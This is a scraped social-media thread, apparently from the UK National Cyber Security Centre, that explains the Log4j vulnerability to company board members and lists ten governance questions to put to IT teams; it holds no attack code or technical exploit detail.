🚨 Board members 🚨
You may have heard about #Log4j, a critical vulnerability that has the cyber community concerned.
Here's what it is, why people are worried, & questions you need to be asking your IT teams right now:
📖 (1/19)
You may have heard about #Log4j, a critical vulnerability that has the cyber community concerned.
Here's what it is, why people are worried, & questions you need to be asking your IT teams right now:
📖 (1/19)
https://twitter.com/FinancialTimes/status/1470808351206428680
#Log4j is used by developers to keep track of what happens in their software applications.
📒 It’s a huge journal of the activity of a system or application and is used by developers to keep an eye on any problems.
(2/19)
📒 It’s a huge journal of the activity of a system or application and is used by developers to keep an eye on any problems.
(2/19)
Last week, versions of #Log4j were found to have a critical vulnerability.
🕵️If left unfixed, attackers can use it to break into networks and enable malicious activity like stealing data and infecting networks.
(3/19)
🕵️If left unfixed, attackers can use it to break into networks and enable malicious activity like stealing data and infecting networks.
(3/19)
What makes this so concerning is the challenge for organisations of working out:
➕ Which services use the #Log4j component
➕ Which of these services are being used
➕ Whether these services are vulnerable
(4/19)
➕ Which services use the #Log4j component
➕ Which of these services are being used
➕ Whether these services are vulnerable
(4/19)
❓How concerned should boards be?
#Log4j has the potential to cause severe impact for an organisation. As experts attempt to detect which services are vulnerable, attackers start to exploit the vulnerability. The situation is changing regularly.
ncsc.gov.uk/blog-post/log4…
(5/19)
#Log4j has the potential to cause severe impact for an organisation. As experts attempt to detect which services are vulnerable, attackers start to exploit the vulnerability. The situation is changing regularly.
ncsc.gov.uk/blog-post/log4…
(5/19)
At the moment, the majority of attacks are automated and exploratory. But should ransomware be delivered through #Log4j:
🔴business operations could be disrupted
🧑disclosures needed about personal data affected
💷costs involved with incident response & recovery
(6/19)
🔴business operations could be disrupted
🧑disclosures needed about personal data affected
💷costs involved with incident response & recovery
(6/19)
As such, the potential impacts range from minimal to a crippling attack on the organisation.
🤝Managing that risk requires strong leadership and working in concert with technical teams.
(7/19)
🤝Managing that risk requires strong leadership and working in concert with technical teams.
(7/19)
With all this in mind it's no wonder that #Log4j has the cyber community concerned.
❓ Whether you're up to speed or hearing about it for the first time, we've put together 10 questions you should be asking of your IT teams.
(8/19)
❓ Whether you're up to speed or hearing about it for the first time, we've put together 10 questions you should be asking of your IT teams.
(8/19)
1⃣: Who's leading on this?
🐯 #Log4j is severe enough that a 'tiger team' of staff should be assembled, with a designated individual leading the response.
(9/19)
🐯 #Log4j is severe enough that a 'tiger team' of staff should be assembled, with a designated individual leading the response.
(9/19)
2⃣: What's our plan?
📅 There will likely be a migration to a more methodical approach to identifying how organisations are affected. Large organisations will need a phased approach to handling this issue over many weeks or months.
(10/19)
📅 There will likely be a migration to a more methodical approach to identifying how organisations are affected. Large organisations will need a phased approach to handling this issue over many weeks or months.
(10/19)
3⃣: How will we know if we're being attacked - and how can we respond?
⚔️Would your teams know if the organisation is being targeted and how prepared are they for an at-scale response?
(11/19)
⚔️Would your teams know if the organisation is being targeted and how prepared are they for an at-scale response?
(11/19)
4⃣: What visibility of our software/servers do we have?
🔎Your IT teams should be trying to find instances of software and #Log4j itself. This task will be easier on corporately-managed assets but less so on unmanaged assets.
(12/19)
🔎Your IT teams should be trying to find instances of software and #Log4j itself. This task will be easier on corporately-managed assets but less so on unmanaged assets.
(12/19)
5⃣: How are we addressing shadow IT & appliances?
🔍Many organisations won’t know all the places #Log4j might be running. Encourage teams to think about how they'll discover things that have slipped through the net.
(13/19)
🔍Many organisations won’t know all the places #Log4j might be running. Encourage teams to think about how they'll discover things that have slipped through the net.
(13/19)
6⃣: Do we know if key providers are covering themselves?
🛡️ If your organisation is dependent on any particularly key suppliers, you should have an open & honest conversation with them, acknowledging they will also be trying to understand the severity of the issue.
(14/19)
🛡️ If your organisation is dependent on any particularly key suppliers, you should have an open & honest conversation with them, acknowledging they will also be trying to understand the severity of the issue.
(14/19)
7⃣: Who internally develops Java code? What's their plan for find out if we're affected?
#⃣ Larger organisations may produce code themselves. Java developers may have used #Log4j, so it's important to ensure any software written is not vulnerable.
(15/19)
#⃣ Larger organisations may produce code themselves. Java developers may have used #Log4j, so it's important to ensure any software written is not vulnerable.
(15/19)
8⃣: How will people report issues they find?
📨 Many researchers are trying to detect vulnerable software right now. Should they find something on your estate, can they contact you easily?
(16/19)
📨 Many researchers are trying to detect vulnerable software right now. Should they find something on your estate, can they contact you easily?
(16/19)
9⃣: When did we last check our business continuity plans and crisis response?
📋Verify your end-to-end BCP and crisis response processes.
(17/19)
📋Verify your end-to-end BCP and crisis response processes.
(17/19)
🔟: How are we preventing teams from burning out?
🩹 Remediating this is likely to take weeks, or months for larger organisations. The combination of an ever-evolving situation (& the potential for severe impacts) can lead to burnout in staff if they’re not supported.
(18/19)
🩹 Remediating this is likely to take weeks, or months for larger organisations. The combination of an ever-evolving situation (& the potential for severe impacts) can lead to burnout in staff if they’re not supported.
(18/19)
📖 Learn more about mitigating the threat of #Log4j in our full guidance to board members:
ncsc.gov.uk/blog-post/log4…
(19/19)
ncsc.gov.uk/blog-post/log4…
(19/19)
• • •
Missing some Tweet in this thread? You can try to
force a refresh
